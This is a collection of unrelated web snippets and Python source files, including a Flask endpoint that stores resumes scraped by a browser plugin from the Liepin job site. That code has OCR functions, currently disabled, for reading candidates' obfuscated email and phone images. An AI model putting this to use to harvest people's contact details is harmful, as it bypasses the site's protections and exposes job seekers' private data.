Do you have dreams of working in a risky environment like a construction site in the future? If you do, then you would know what a job in this kind of industry consists of. Working in a tough industry such as construction is never going to be easy for anyone because there is a lot of hard and risky work that you would need to do. Among all of this, working on top of elevated platforms like cranes and forklifts is a commonly done task. While it might sound easy to get into a forklift and make your way to the top, it is actually very dangerous if you do not have the training to be doing it right. If you wish to prove your skill to others and want to work such a job, then you are going to need your elevated work platform license. This license is only going to come through intense training, but here are some important reasons to have an elevated work platform license.
A wider chance for jobs!
Even though construction sites are seen to be using elevated work platforms a lot of the time, this is not the only job where an EWP license will come in handy for you! There are a lot of other high paying jobs that would require for you to work on a forklift or a scissor lift and so, proving you have gone through an elevated work platform training course by having your license, is going to show people you are capable of taking any great job. This is why an ewp license will open more doors for you!
While there are a lot of people trying to find their steady place in the world, there are others who have great jobs that they love doing. If you are someone with a good job in a construction related field, then you might want to think about moving up the ladder and developing your own career. Elevated work platform training and getting your ewp license is going to help you start your career journey and will help you make your way to the top with time!
Sometimes managers and supervisors in the field of construction are only going to monitor the work done by their employees but not having knowledge about their work is going to make this job harder for you. As a manager, if you wish to do the best, then getting your ewp license will help you better understand what your employees are doing.
|
import logging
from zope.interface import alsoProvides
from Products.CMFPlone.utils import getToolByName
from Products.MimetypesRegistry.MimeTypeItem import MimeTypeItem
from collective.geo.file.interfaces import IGisFile
# The profile id of your package:
PROFILE_ID = 'profile-collective.geo.file:default'
gis_mimetypes = [
{'name': 'application/vnd.google-earth.kml+xml',
'extensions': ('kml',),
'globs': ('*.kml',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/vnd.google-earth.kml+xml',)},
{'name': 'application/gpx+xml',
'extensions': ('gpx',),
'globs': ('*.gpx',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/gpx+xml',)}
]
def do_nothing(context, logger=None):
    """Placeholder upgrade step: logs that nothing was done.

    `context` is unused; `logger` defaults to this package's logger when the
    function is invoked as a GenericSetup upgrade step.
    """
    log = logger if logger is not None else logging.getLogger('collective.geo.file')
    log.info("Empty upgrade step")
def attach_igisfile(context, logger=None):
    """Upgrade step: apply the IGisFile marker to existing KML/GPX Files."""
    catalog = getToolByName(context, 'portal_catalog')
    brains = catalog(portal_type='File')
    for brain in brains:
        ob = brain.getObject()
        mimetype = ob.content_type
        if mimetype in ['application/vnd.google-earth.kml+xml',
                        'application/gpx+xml']:
            if not IGisFile.providedBy(ob):
                alsoProvides(ob, IGisFile)
                # NOTE(review): this flag is never read and the object is not
                # reindexed -- was ob.reindexObject() intended here? confirm.
                reindex = True
def add_extract_menue(context, logger=None):
    """Upgrade step: re-run the profile's 'actions' import to add the menu."""
    if logger is None:
        # Called as upgrade step: fall back to this package's logger.
        logger = logging.getLogger('collective.geo.file')
    setup_tool = getToolByName(context, 'portal_setup')
    setup_tool.runImportStepFromProfile(PROFILE_ID, 'actions')
def import_various(context):
    """Import step for configuration that is not handled in xml files."""
    # Only run when this profile's flag file is present in the import context.
    if context.readDataFile('collective.geo.file-default.txt') is None:
        return
    logger = context.getLogger('collective.geo.file')
    site = context.getSite()
    registry = getToolByName(site, 'mimetypes_registry')
    known = registry.list_mimetypes()
    # Register any of our GIS mimetypes that the site does not know yet.
    for mtype in gis_mimetypes:
        if mtype['name'] in known:
            continue
        logger.info('Registering mimetype %s' % mtype['name'])
        registry.register(MimeTypeItem(**mtype))
|
The Vastex V2000HD Series of heavy-duty manual screen printing presses offers the screen printing professional a range of advanced capabilities that decrease set-up time, improve registration accuracy and increase productivity.
The V2000HD heavy duty print head allows the industry's fastest set-up and micro-registration, and accepts clamp-on DiGiT athletic numbering jigs and side-clamp accessories in 20 seconds.
V2000HD screen printing presses are offered in models from 1 station/1 color to 10 station/10 color in increments of one station and/or one color. Fully expandable, they allow growing shops to start small and add stations and print heads to boost output or achieve special effects.
|
# From https://www.digikey.com/Web%20Export/Supplier%20Content/Vishay_8026/PDF/VishayBeyschlag_SolderPad.pdf?redirected=1
from babyfood.pcb.PCBUnits import mil
from babyfood.features.basic import CenteredRectangle, FilledCenteredRectangle
from babyfood.components.ABC import AbstractSMAComponent
# Solder-pad geometry per imperial size code, from the Vishay Beyschlag
# application note linked above.  Tuple order matches the (_g, _y, _x, _z)
# unpack in SMAResistor.__init__; values are in millimetres.
# NOTE(review): per the datasheet naming, G/Y/X/Z appear to be pad gap,
# pad width, pad height and overall span -- confirm against the PDF.
resistorsParams = {
    "0102": (0.65, 1.10, 1.40, 2.85),
    "0204": (1.50, 1.25, 1.75, 4.00),
    "0207": (2.80, 2.20, 2.20, 7.20),
    "0402": (0.25, 0.60, 0.55, 1.45),
    "0603": (0.50, 0.95, 0.95, 2.40),
    "0805": (0.65, 1.10, 1.40, 2.85),
    "1206": (1.50, 1.25, 1.75, 4.00)}
class SMAResistor(AbstractSMAComponent):
    """Footprint generator for a surface-mount chip resistor.

    `codeString` is the imperial size code (e.g. "0805"), used both to look
    up the recommended pad geometry in `resistorsParams` and to derive the
    silkscreen outline dimensions.
    """
    def __init__(self, codeString):
        # Names on datasheet ref'ed above.
        _g, _y, _x, _z = resistorsParams[codeString]
        # Pad dimensions we actually draw with.
        self._w = _y
        self._h = _x
        # Pad centers sit half the gap plus half a pad width off the origin.
        shift = (_g / 2) + (_y / 2)
        # Size code digits are hundredths of an inch; 0.254 converts to mm.
        self._outline = int(codeString[0:2]) * 0.254, int(codeString[2:4]) * 0.254
        # Bug fix: removed leftover debug `print(self._outline)` that spammed
        # stdout every time a resistor footprint was instantiated.
        self._centers = ((-shift, 0),
                         (+shift, 0))

    def draw(self, ctx):
        """Draw the outline, copper pads and solder-mask openings via ctx."""
        pad = FilledCenteredRectangle(self._w, self._h)
        # Mask opening is 0.1 mm smaller than the pad in each dimension.
        mask = FilledCenteredRectangle(self._w - 0.1, self._h - 0.1)
        outline = CenteredRectangle(*self._outline)
        ctx.setActiveLayer("overlay")
        outline.draw(ctx)
        for cp in self._centers:
            with ctx.transform.translation(*cp):
                ctx.setActiveLayer("copper")
                pad.draw(ctx)
                ctx.setActiveLayer("mask")
                mask.draw(ctx)
|
Who Are You Looking For In Eland, Wisconsin?
Run a search by name for anyone in Eland, Wisconsin & get free white pages information instantly. Eland, Wisconsin white page directory listings include full name, phone number and address.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@file analyze_teleports.py
@author Jakob Erdmann
@date 2012-11-20
@version $Id: analyze_teleports.py 14425 2013-08-16 20:11:47Z behrisch $
Extract statistics from the warning outputs of a simulation run for plotting.
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2008-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import os,sys
import re
from collections import defaultdict
def parse_log(logfile, edges=True, aggregate=3600):
print "Parsing %s" % logfile
reFrom = re.compile("lane='([^']*)'")
reTime = re.compile("time=(\d*)\.")
# counts per lane
waitingCounts = defaultdict(lambda:0)
collisionCounts = defaultdict(lambda:0)
# counts per step
waitingStepCounts = defaultdict(lambda:0)
collisionStepCounts = defaultdict(lambda:0)
for line in open(logfile):
try:
if "Warning: Teleporting vehicle" in line:
edge = reFrom.search(line).group(1)
time = reTime.search(line).group(1)
if edges:
edge = edge[:-2]
if "collision" in line:
collisionCounts[edge] += 1
collisionStepCounts[int(time) / aggregate] += 1
else:
waitingCounts[edge] += 1
waitingStepCounts[int(time) / aggregate] += 1
except:
print sys.exc_info()
sys.exit("error when parsing line '%s'" % line)
return (waitingCounts, collisionCounts,
waitingStepCounts, collisionStepCounts)
def print_counts(countDict, label):
counts = [(v,k) for k,v in countDict.items()]
counts.sort()
print counts
print label, 'total:', sum(countDict.values())
def main(logfile):
    """Print teleport statistics for logfile and write a gnuplot data file."""
    waitingCounts, collisionCounts, waitingStepCounts, collisionStepCounts = parse_log(logfile)
    print_counts(waitingCounts, 'waiting')
    print_counts(collisionCounts, 'collisions')
    # generate plot data covering the full observed time range
    min_step = min(min(waitingStepCounts.keys()),
                   min(collisionStepCounts.keys()))
    max_step = max(max(waitingStepCounts.keys()),
                   max(collisionStepCounts.keys()))
    plotfile = logfile + '.plot'
    with open(plotfile, 'w') as f:
        # First line documents the gnuplot command that renders the data.
        f.write("# plot '%s' using 1:2 with lines title 'waiting', '%s' using 1:3 with lines title 'collisions'\n" % (
            plotfile, plotfile))
        # One row per interval: step, waiting count, collision count.
        for step in range(min_step, max_step + 1):
            print >>f, ' '.join(map(str,[step, waitingStepCounts[step], collisionStepCounts[step]]))
# usage: analyze_teleports.py <logfile>
if __name__ == "__main__":
    main(*sys.argv[1:])
|
Michigan State’s offense wasn’t pretty, even when it worked Saturday.
EAST LANSING — Michigan State’s offense wasn’t pretty, even when it worked Saturday.
Missed assignments and miscommunication by the offensive line. Wrong routes and drops by the wide receivers. Struggles at running back and quarterback. Faulty play-calling and stalled drives.
Even Tyler O’Connor’s touchdown pass to Delton Williams came off glitchy, with the shotgun snap nearly hitting an in-motion R.J. Shelton and turning into a loose ball situation.
The timing is off, no question. But beyond the naked eye, the DVR rewinding and slow-motion video/still-photo analysis, the Spartans’ struggles simply do not rest solely on O’Connor’s head and shoulders.
No doubt, mistakes were made offensively in the 24-21 overtime loss to Indiana, MSU’s second straight to start Big Ten play. They came from young players like Donnie Corley and veterans like Brandon Clemons.
And, yes, they came from O’Connor, too.
The Spartans produced 438 yards of offense, including 234 from O’Connor’s arm and 36 more from his legs. However, he failed to get the offense on the same page and needed to burn a timeout on second down in overtime, with his teammates confused and frustrated.
Then came two sacks of the fifth-year senior on the next two snaps. O’Connor admitted afterward that he probably should have handed off the ball on the first play to LJ Scott on the run-pass option. But sophomore left tackle David Beedle’s man beat him off the edge and dropped the quarterback. On the next play, Beedle missed a “twist exchange” with junior Brian Allen, and O’Connor didn’t have a chance to even get rid of the ball.
Beedle also had a pair of false starts, part of why MSU is shuffling its offensive line for this week’s game against BYU (3:30 p.m./ABC).
“I always talk about the thumb,” offensive line coach Mark Staten said Wednesday as he pointed to his own chest. “I always talk about, ‘Hey, what’s Mark Staten doing?’ and the O-line trying to take that, ‘Hey, what am I doing?’ philosophy.
Three freshmen receivers are now in the six-man rotation, but Corley dropped a deep O’Connor pass from the end zone in the third quarter, which landed on his hands in stride. It could have been a touchdown, or at least a big third-down conversion. Add that in and O’Connor eclipses 300 yards and might have four TD passes.
Mark Dantonio said those young wideouts also struggled with their assignments.
“What you also don't recognize is that a route needs to be run at 18 (yards) and it’s run at 13 – big difference for the quarterback,” Dantonio said. “You've got some drops out there. You've got a guy running a route or not running a route when it's a pass route and he's out there blocking. I mean, that causes a problem for the quarterback.
Solari: Time for Michigan State to fix present or look to future?
Even the players who returned with experience this season hadn’t played the same significant roles during the past three years. There’s an adjustment period when you lose players to the pros such as Connor Cook, Aaron Burbridge, Jack Allen, Jack Conklin and Donavon Clark.
Perhaps the surprising reality is MSU’s offense is actually producing more yardage than it was a year ago at this time (406.2 per game in 2016 through four games, 372.2 in 2015). It has four more first downs as well.
One of the problems has come in finishing drives – the Spartans had five more touchdowns last season and six fewer turnovers. MSU also is converting just 38% of its 56 third-down chances compared to 49% of just 49 third downs a year ago.
O’Connor is throwing for 20 more yards per game than Cook did a year ago as a fifth-year senior and has eight TD passes to Cook’s nine. The five interceptions and lost fumble this season, though, are a big difference in the quarterback spot. So, too, are the eight sacks O’Connor has absorbed compared to the three times Cook was dropped in last year’s first four games.
The Scott-Gerald Holmes-Madre London trio has run for 30 more yards this season. They also have just four TDs to eight at this time a year ago, and Scott’s costly fumble swung momentum in the loss to Wisconsin.
And that doesn’t even get into the ongoing issue with penalties.
Yet there are two major differences in a year: the Spartans are scoring 10.4 fewer points, and they are 2-2 instead of 4-0.
And those are the stats that matter most. As Dantonio has said, it’s a collective failure on that front. Fixing those smaller issues are the only way to correct the larger ones.
|
##
# Copyright (c) 2005-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from twisted.internet.defer import inlineCallbacks, returnValue
from twext.python.log import Logger
from twistedcaldav.config import config
from twistedcaldav.memcacher import Memcacher
from txdav.caldav.datastore.scheduling.caldav.delivery import ScheduleViaCalDAV
from txdav.caldav.datastore.scheduling.cuaddress import RemoteCalendarUser, EmailCalendarUser, InvalidCalendarUser
from txdav.caldav.datastore.scheduling.delivery import DeliveryService
from txdav.caldav.datastore.scheduling.imip.delivery import ScheduleViaIMip
from txdav.caldav.datastore.scheduling.ischedule.delivery import ScheduleViaISchedule
__all__ = [
"ScheduleAddressMapper",
"mapper",
]
log = Logger()
"""
Handle mapping a calendar user address to a schedule delivery type.
"""
class ScheduleAddressMapper(object):
    """
    Class that maps a calendar user address into a delivery service type.
    """

    def __init__(self):
        # We are going to cache mappings whilst running
        self.cache = Memcacher("ScheduleAddressMapper", no_invalidation=True)

    @inlineCallbacks
    def getCalendarUser(self, cuaddr):
        """Wrap cuaddr in the CalendarUser class matching its delivery type."""
        # Get the type
        cuaddr_type = (yield self.getCalendarUserServiceType(cuaddr))
        if cuaddr_type == DeliveryService.serviceType_caldav:
            # NOTE(review): the caldav branch returns the same
            # InvalidCalendarUser as the fallback -- confirm this is the
            # intended behavior for local addresses.
            returnValue(InvalidCalendarUser(cuaddr))
        elif cuaddr_type == DeliveryService.serviceType_ischedule:
            returnValue(RemoteCalendarUser(cuaddr))
        elif cuaddr_type == DeliveryService.serviceType_imip:
            returnValue(EmailCalendarUser(cuaddr))
        else:
            returnValue(InvalidCalendarUser(cuaddr))

    @inlineCallbacks
    def getCalendarUserServiceType(self, cuaddr):
        """Return the delivery service type string for cuaddr, caching it."""
        # Try cache first
        cuaddr_type = (yield self.cache.get(str(cuaddr)))
        if cuaddr_type is None:
            # CalDAV is always consulted; iSchedule/iMIP only when enabled.
            serviceTypes = (ScheduleViaCalDAV,)
            if config.Scheduling[DeliveryService.serviceType_ischedule]["Enabled"]:
                serviceTypes += (ScheduleViaISchedule,)
            if config.Scheduling[DeliveryService.serviceType_imip]["Enabled"]:
                serviceTypes += (ScheduleViaIMip,)
            for service in serviceTypes:
                matched = (yield service.matchCalendarUserAddress(cuaddr))
                if matched:
                    # First match wins; remember it for next time.
                    yield self.cache.set(str(cuaddr), service.serviceType())
                    returnValue(service.serviceType())
        returnValue(cuaddr_type)

    def isCalendarUserInMyDomain(self, cuaddr):
        """Return a Deferred firing True when cuaddr maps to local caldav."""
        # Check whether it is a possible local address
        def _gotResult(serviceType):
            return serviceType == DeliveryService.serviceType_caldav

        d = self.getCalendarUserServiceType(cuaddr)
        d.addCallback(_gotResult)
        return d
mapper = ScheduleAddressMapper()
|
No OPTIONS for company (ALF) AUSTRALIAN LEADERS FUND LIMITED.
No Warrants for company (ALF) AUSTRALIAN LEADERS FUND LIMITED.
Server processing from 2019-04-19 18:55:56 thru 2019-04-19 18:55:56 GMT for 0 secs.
|
# Run with Python 3
# install python3-espeak
# /usr/lib/python3/dist-packages/espeak/espeak.py
#
# Interactive demo for the python3-espeak bindings: list the available
# voices, speak user-supplied text, or dump the espeak module's members.
from espeak import espeak
import sys
done = False
while not done:
    print()
    print( "1. Display voices" )
    print( "2. Speak text" )
    print( "3. View espeak functions" )
    print( "4. Quit" )
    # FIX: non-numeric input used to crash the script with ValueError.
    try:
        choice = int( input( "What do you want to do? >> " ) )
    except ValueError:
        print( "Please enter a number from 1 to 4." )
        continue
    print()
    if ( choice == 1 ):
        print( "VOICES" )
        voices = espeak.list_voices()
        print( "Identifier","Name","Gender","Age","Variant" )
        for voice in voices:
            print( "Name: ", voice.name )
            print( "Identifier: ", voice.identifier )
            print( "Gender: ", voice.gender )
            print( "Age: ", voice.age )
            print( "Variant: ", voice.variant )
            print()
    elif ( choice == 2 ):
        print( "SPEAK" )
        voice = input( "What voice do you want to use? >> " )
        espeak.set_voice( voice )
        text = input( "What do you want to say? >> " )
        print( "Saying \"" + text + "\"" )
        espeak.synth( text )
    elif ( choice == 3 ):
        print( "FUNCTIONS" )
        for member in dir( espeak ):
            print( member )
    elif ( choice == 4 ):
        # FIX: the original loop had no exit path - 'done' was never set
        # True, so the menu could only be left by killing the process.
        done = True
|
This site does not provide Medical or Health Care Advice. This site is intended for use by adults only.
The information on this page is informational in nature and should never be construed as a substitute for medical advice. The information on this site should never be used as a diagnosis or medical treatment. If necessary, consult your doctor, general practitioner, dietitian or nutritionist before beginning any diet, exercise or supplementation program, before taking any medication or nutritional supplement, or if you have or suspect that you might have a health problem.
Information on this site is for information purposes only. Information on this site is not intended as a substitute for advice from your doctor, G.P, physician or health care professional.
Claims made about any products on this site are not intended to diagnose, treat, cure or prevent disease/s. You are advised against relying on any information or claim made about products on our site as the information/data/content is provided as means of general information. Professional and/or specialist advice is highly recommended before taking any action relating to nutrition and health.
You are advised against using information on this site to diagnose or treat any health issue or as a substitute for medication or treatment prescribed by your doctor, GP, physician or health care professional.
Always consult your doctor, GP, physician or health care professional before taking any medication, nutritional supplement, diet, exercise or physical/nutritional program.
You are advised to consult your doctor, GP, physician or health care professional in regards to any potential adverse interactions between medication you may be currently using and nutritional supplements you may buy from www.samskaratribe.com or even any other nutritional supplement you may be taking.
We try our level best to keep the website updated, with accurate and honest information however We strictly do not make any representations, warranties or guarantees (whether express or implied) that the content on this website is complete, accurate and up-to-date as per market knowledge.
Having in mind our activity across various social medias, websites and collaborations, we honestly confess, although we have financial interest in the products we speak and promote, Users/visitors/Buyers of www.samskaratribe.com should be assured that we, at www.samskaratribe.com will never recommend anything we do not believe in ourselves or wouldn’t use ourselves.
We provide substantial information on the individual product pages, including ‘Suggested use’ information for best results. We highly recommend that users do not consume food/supplementation multiple times within a short span of time (ideally no more than once in a 2-hour span) so your food gets digested well, you maintain energy and the digestive process doesn’t get confused.
Our website (www.samskaratribe.com) offers products with the prime intention to improve health, and thus we inform all users/visitors/buyers that our products do not necessarily taste pleasant, as our intention remains to keep our products organic and ecological, strictly free of chemicals, genetically modified organisms, gluten and artificial flavourings, and sugar free.
With the intention to sell bio available products with least processing, closest to it’s natural and consumable stage and state, we (www.samskaratribe.com) hence do not guarantee our products to taste as ideal or pleasant as other supplements.
We highly recommend users to be cautious about different combination of foods, be it (a) foods bought from this website (www.samskaratribe.com) (b) food bought from this website (www.samskaratribe.com) and any external source, (c) food bought entirely from external source. Consult your doctor, GP, physician or health care professional if necessary before combining different foods together. This site (www.samskaratribe.com) takes absolutely no responsibility for adverse reactions resulting from use of any food bought from our site (www.samskaratribe.com) or even any external source. The user is entirely held responsible for the way they choose to combine their products. We (www.samskaratribe.com) have prepared a series of combination products (Samskara Booster Combos) that in our knowledge, experience, learning and experiments have proved to be a suitable combination for consumption, any combination suggestions or ideas made outside our website, or under user comments section of our website is considered void and not recomendable from us.
|
from test.test_support import run_unittest, have_unicode
import unittest
import sys
class TestImplementationComparisons(unittest.TestCase):
    """Exercise CPython 2 comparison semantics: ordering of unrelated types,
    cmp(), and comparisons of closure cell objects (func_closure).

    NOTE(review): Python 2 only -- cmp(), func_closure and ordering of
    objects of unrelated types were all removed in Python 3.
    """
    def test_type_comparisons(self):
        # Unrelated types have an arbitrary but consistent total ordering in
        # CPython 2, so exactly one direction of each pair must hold...
        self.assertTrue(str < int or str > int)
        self.assertTrue(int <= str or int >= str)
        # ...and cmp() must therefore be non-zero for distinct types.
        self.assertTrue(cmp(int, str) != 0)
        # Identity and (in)equality sanity checks on the type objects.
        self.assertTrue(int is int)
        self.assertTrue(str == str)
        self.assertTrue(int != str)
    def test_cell_comparisons(self):
        # Build two closures: g captures x (always bound); h captures y,
        # which is assigned only when x is truthy -- so f(0) leaves y's
        # cell empty (unbound).
        def f(x):
            if x:
                y = 1
            def g():
                return x
            def h():
                return y
            return g, h
        g, h = f(0)
        g_cell, = g.func_closure
        h_cell, = h.func_closure
        # The empty cell (h_cell) compares less than the bound one (g_cell)
        # in CPython 2, hence cmp() of the reverse pair is 1.
        self.assertTrue(h_cell < g_cell)
        self.assertTrue(g_cell >= h_cell)
        self.assertEqual(cmp(g_cell, h_cell), 1)
        # Reflexive identity/equality, plus inequality of distinct cells.
        self.assertTrue(g_cell is g_cell)
        self.assertTrue(g_cell == g_cell)
        self.assertTrue(h_cell == h_cell)
        self.assertTrue(g_cell != h_cell)
def test_main():
    # Standard entry point used by Python 2's stdlib regression-test runner
    # (test.test_support.run_unittest collects and runs the TestCase).
    run_unittest(TestImplementationComparisons)
if __name__ == '__main__':
    test_main()
|
The ministry and mission of St Thomas’ Church is enabled entirely through the generosity of its church members, many of whom give sacrificially of their time, their talents, and their finance to support the work of the church.
If you would like to give of your time or your talents to support the work of the church, please see our Get Involved pages for more information on how you can do this.
If you would like to contribute financially to support the ministry of the church, please find a Standing Order form here. If you are a tax-payer, it is a great benefit to the church if you can give tax-efficiently (we can claim back 25p for every £1 you donate). Please find a Gift Aid form here. Please return completed forms to: The Treasurer, St Thomas’s Church Office, Marton St, Lancaster, LA1 1XX.
|
#
# This file is part of KwarqsDashboard.
#
# KwarqsDashboard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# KwarqsDashboard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with KwarqsDashboard. If not, see <http://www.gnu.org/licenses/>.
#
import gtk
import gobject
from .image_button import ImageButton
class ToggleButton(gtk.HBox):
    '''
    Similar to a GTK CheckButton, but different. A different pixbuf is
    shown depending on the button toggled state.
    .. seems like they should already have this implemented, but I can't
    find one.
    '''
    # Custom 'toggled' signal, emitted whenever the active state changes
    # (no arguments; read get_active() from the handler).
    __gsignals__ = {
        'toggled': (gobject.SIGNAL_ACTION, gobject.TYPE_NONE, ()),
    }
    def __init__(self, active_pixbuf, inactive_pixbuf, label=None, clickable=False, default=False):
        '''
        :param active_pixbuf: The pixbuf to be shown when the button is in the 'active' state
        :param inactive_pixbuf: The pixbuf to be shown when the button is in the 'inactive' state
        :param label: Text to show with the button
        :param clickable: Does the button accept user input?
        :param default: The default state for the button: True is active, False is inactive
        '''
        gtk.HBox.__init__(self)
        self.set_spacing(5)
        self.image_button = ImageButton()
        self.pack_start(self.image_button, False, False)
        # Deliberately start in the *opposite* state so that the
        # set_active(default) call below always sees a state change and
        # therefore installs the pixbuf matching the requested default.
        self.active = not default
        self.active_pixbuf = active_pixbuf
        self.inactive_pixbuf = inactive_pixbuf
        if clickable:
            self.image_button.connect('clicked', self.on_clicked)
        if label is not None:
            self.label = gtk.Label(label)
            self.pack_start(self.label, False, False)
        # NOTE: as a side effect of the trick above, this emits one
        # 'toggled' signal during construction.
        self.set_active(default)
    def on_clicked(self, widget):
        # Click handler (connected only when clickable=True): flip state.
        self.set_active(not self.active)
    def get_active(self):
        # Current state: True is active, False is inactive.
        return self.active
    def set_active(self, active):
        # Update the state, swap the displayed pixbuf and emit 'toggled'.
        # No-op when the requested state equals the current one.
        if active != self.active:
            self.active = active
            if active:
                self.image_button.set_from_pixbuf(self.active_pixbuf)
            else:
                self.image_button.set_from_pixbuf(self.inactive_pixbuf)
            self.emit('toggled')
# Register the widget (and its custom signal) with the GObject type system.
gobject.type_register(ToggleButton)
|
Morris Property are delighted to OFFER FOR LET, this recently redecorated two bed mid terrace property. Located within walking distance of Padiham town centre the property is offered as a long term let and is ideal for a small family given its location to local shops, schools and local amenities.
The property briefly comprises a small flagged garden, entrance, living room with feature fireplace, kitchen with a mix of wall and base units, and a door leading to a private walled yard. On the first floor, stairs/landing lead to a rear-facing single bedroom and a front-facing double bedroom.
This property is currently let.
|
# -*- coding: utf-8 -*-
import bs4
import time
import flask
import flask_restful
from flask_restful import Resource, reqparse
import tools.image
class LiepinPluginSyncObject(object):
    """Parses a Liepin resume page (HTML pushed by the browser plugin) and
    stores it into a CV storage backend via add_new()."""
    committer = 'PLUGIN'
    def __init__(self, url, htmlsource, base64email, base64phone):
        # url: source page URL (also used as the stored file name)
        # htmlsource: raw HTML of the resume page
        # base64email / base64phone: screenshots of the obfuscated contact
        # fields (OCR decoding is currently disabled, see generate_yaml)
        self.url = url
        self.htmlsource = htmlsource
        self.base64email = base64email
        self.base64phone = base64phone
        # FIX: initialize the status fields *before* parse_source() runs.
        # The original code reset them afterwards, silently discarding the
        # 'NoLoginError' status and parse_result that parse_source() sets.
        self.loginfo = ''
        self.parse_result = False
        self.raw_html, self.raw_yaml = self.parse_source()
        self.info = self.generate_yaml()
    def generate_yaml(self):
        """Build the metadata dict stored alongside the resume HTML."""
        info = dict()
        info.update(self.raw_yaml)
        info['committer'] = 'PLUGIN'
        info['origin'] = u'猎聘爬取'
        # OCR of the contact-info screenshots is disabled for now.
        #info['email'] = self.email_from_base64()
        #info['phone'] = self.phone_from_base64()
        return info
    def email_from_base64(self):
        """OCR the email screenshot into text (spaces stripped)."""
        img = tools.image.image_from_base64(self.base64email)
        preimg = tools.image.preprocess(img)
        result = tools.image.image_to_string(preimg)
        return result.replace(' ', '')
    def phone_from_base64(self):
        """OCR the phone screenshot into text (spaces stripped)."""
        img = tools.image.image_from_base64(self.base64phone)
        preimg = tools.image.preprocess(img)
        result = tools.image.image_to_string(preimg)
        return result.replace(' ', '')
    def parse_source(self):
        """Extract the resume body and metadata from the page HTML.

        Returns (html, details): prettified resume markup ('' on failure)
        and a metadata dict ({} when nothing useful could be parsed).
        Sets self.parse_result / self.loginfo accordingly.
        """
        bs = bs4.BeautifulSoup(self.htmlsource, 'lxml')
        # FIX: detect the login page *first*. The original code accessed
        # the res_id span before this check, raising AttributeError on
        # pages without that span (e.g. the login form itself).
        if bs.find(class_='user-login-reg') is not None:
            self.loginfo = 'NoLoginError'
            self.parse_result = False
            return '', {}
        details = dict()
        details['date'] = time.time()
        details['filename'] = self.url
        idtag = bs.find('span', attrs={'data-nick': 'res_id'})
        if idtag is None:
            # FIX: a missing resume id used to crash with AttributeError.
            self.loginfo = 'NoResumeIdError'
            self.parse_result = False
            return '', {}
        details['id'] = idtag.text
        details['originid'] = idtag.text
        # Strip navigation, footer, scripts and links from the stored copy.
        for tag in (bs.find(class_='side'), bs.find('footer')):
            if tag is not None:  # FIX: original crashed when these were absent
                tag.decompose()
        for js in bs.findAll('script'):
            js.decompose()
        for a in bs.findAll('a'):
            a.decompose()
        content = bs.find(class_='resume')
        if content is None:
            # FIX: a missing resume container used to crash with AttributeError.
            self.loginfo = 'NoResumeContentError'
            self.parse_result = False
            return '', details
        self.parse_result = True
        return content.prettify(), details
    def add_new(self, cvstorage):
        """Store the parsed resume via *cvstorage*; return True on success."""
        result = False
        # FIX: use .get() -- when parsing failed self.info has no 'id' key
        # and the original raised KeyError here.
        cvid = self.info.get('id')
        if cvid:
            if len(self.raw_html) < 500:
                self.loginfo = (' ').join([cvid, 'too short.'])
            else:
                if not cvstorage.exists(cvid):
                    result = cvstorage.addcv(cvid,
                            self.raw_html.encode('utf-8'), self.info)
                else:
                    self.loginfo = (' ').join([cvid, 'exists'])
        else:
            self.loginfo = "without ID."
        if result is True:
            print((' ').join(["Plugin add Liepin", cvid]))
        else:
            print((' ').join(["Plugin add Liepin failed", self.loginfo]))
        return result
class BrowserSyncAPI(Resource):
    """REST endpoint the browser plugin POSTs scraped Liepin pages to."""
    def __init__(self):
        super(BrowserSyncAPI, self).__init__()
        # Storage backend is taken from the active Flask app's config.
        self.LIEPIN_STO_CV = flask.current_app.config['LIEPIN_STO_CV']
        # All payload fields arrive as JSON strings.
        self.reqparse = reqparse.RequestParser()
        for field in ('url', 'html', 'base64email', 'base64phone'):
            self.reqparse.add_argument(field, type = unicode, location = 'json')
    def post(self):
        """Handle one scraped page; store it when it is a Liepin resume."""
        args = self.reqparse.parse_args()
        url = args['url']
        stored_id = ''
        result = False
        if 'liepin' in url:
            lpso = LiepinPluginSyncObject(
                url, args['html'], args['base64email'], args['base64phone'])
            result = lpso.add_new(self.LIEPIN_STO_CV)
            if result is True:
                stored_id = lpso.info['id']
        return {'code': 200, 'url': url, 'result': result, 'id': stored_id}
# Flask application wiring: configuration comes from the plugin server
# settings module.
app = flask.Flask(__name__)
app.config.from_object('plugins.server.settings')
api = flask_restful.Api(app)
# Expose the endpoint the browser plugin POSTs scraped pages to.
api.add_resource(BrowserSyncAPI, '/api/browsersync', endpoint = 'browsersync')
if __name__ == '__main__':
    # Run the development server when this module is executed directly.
    app.run(host='0.0.0.0', port=5888, threaded=True)
|
“Tut Elimden” is a movie produced in 2017. See what information about this film we have collected at our service. You can also check other movies in the same genres by clicking the genre name. If you are interested in movies released in 2017, you can click the year. You can also check other movies with the same cast or with the same writer and director. This is very simple: just click the name. You can also find posters, still photos and trailers connected with this production.
|
# Functions extracting emulator and any other data from LES output NetCDF files,
# and collection of functions for generating LES inputs.
#
# Tomi Raatikanen 18.1.2019
#
# Functions
# =========
# Use Python import to make these functions available, e.g. from LES2emu import GetEmuVars, get_netcdf_variable
#
# a) Functions for extracting data from the LES outputs
# GetEmu2Vars(path)
# GetEmu1Vars(fname,tstart,tend,[ttol,start_offset,end_offset])
# get_netcdf_variable(fname,var_name,target_time,[end_time])
# extract_write_data(fname_template,specs,[name_out,nmax])
# get_netcdf_updraft(fname,tstart,tend,[ttol,tol_clw])
#
# b) Functions for generating LES inputs
# calc_cloud_base(p_surf,theta,rw)
# calc_lwc_altitude(p_surf,theta,rw,zz)
# solve_rw(p_surf,theta,lwc,zz)
